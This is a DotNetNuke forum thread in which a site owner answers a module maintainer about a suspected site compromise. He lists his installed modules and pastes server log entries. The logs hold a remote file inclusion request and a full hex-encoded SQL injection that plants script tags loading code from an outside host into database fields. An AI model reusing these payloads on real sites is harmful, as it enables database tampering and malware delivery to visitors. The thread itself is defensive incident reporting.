Sanjay Mehrotra wrote
Abstraction,
I feel bad about your loss but would like to point out that the feedback module goes through the same rigorous tests as ANY of the other core modules. Since you're not sure about the cause of the hack yourself, it would be appreciated if you do not attempt to spread panic with other users of the module till you can either confirm that this was indeed the source of the issue or work with the core to identify the issue. We have a specific way by which security issues are reported to the core and you can read more about it here first.
What version of DotNetNuke itself were you running for starters?
Sanjay
Hi Sanjay,
I don't really see what the problem was with my original post, the issue was clearly stated, and I haven't said that this module is the problem, I've said it's a possible cause of the problem, which it is. My site was compromised via DNN, so all modules have to be taken in for consideration, am I wrong? One thing I have done is stopped PHP on my server which will more than likely help with allot of this.
I was running dnn 4.8.2. Modules I have had installed (all latest versions) were
Repository Module (2 of them)
News Module with RSS feed on home page
Feedback Module on separate page called Guestbook
Presstopia Forum (Also contacted and notified of said problem), on Forum page
Chat module http://www.dotnetnuke.com/DotNetNukeProjects/ModuleChat/tabid/965/Default.aspx, on a page that was barely used
I know FTP wasn't an issue as this was merely pointing to an empty folder outside of the root of the site.
User registrations were open and for this reason I have had to disable all that and do not trust that side of DotNetNuke as this has now happened twice. Both times with the same modules and has caused me allot of time. My logs are full of all types of attacks but mainly around the same modules,
eg.
/dnn/Guestbook/tabid/61/ include_path=http://grandmalibby4u.com/galleries/extreme/on.txt?
/dnn/Guestbook/tabid/61/Default.aspx ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343
0303029204445434C415245205461626C655F437572736F7220435552534F5220464F52207365
6C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C73
7973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E787479706
53D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220
622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655
F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F722049
4E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494
E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D272
7223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F75
68756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B2
72B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E6
36E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4
558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E44204
34C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572
736F72%20AS%20CHAR(4000));EXEC(@S);
/dnn/Guestbook/tabid/61/Default.aspx ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430
303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737
973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E7874797065
3D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F72206
22E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F
437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494
E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E
20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727
223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F756
8756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B2
72B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E
636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204
E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420
434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572
736F72%20AS%20CHAR(4000));EXEC(@S);
the last 2 inject some scripts from other sources which are now offline, they seemed to return MYSQL information. Only the forum module and the feedback module recieved these types of attack.
Anyway I'm still not 100% definite of the exact point it snapped as I'm still going through the logs, but I do know that the author of the Presstopia forum has said that he hasn't been compromised in this way yet, but still, I have to keep narrowing down of course, so I have not pointed fingers at anything yet, just merely pointing out where the possibilities lie.
Nick.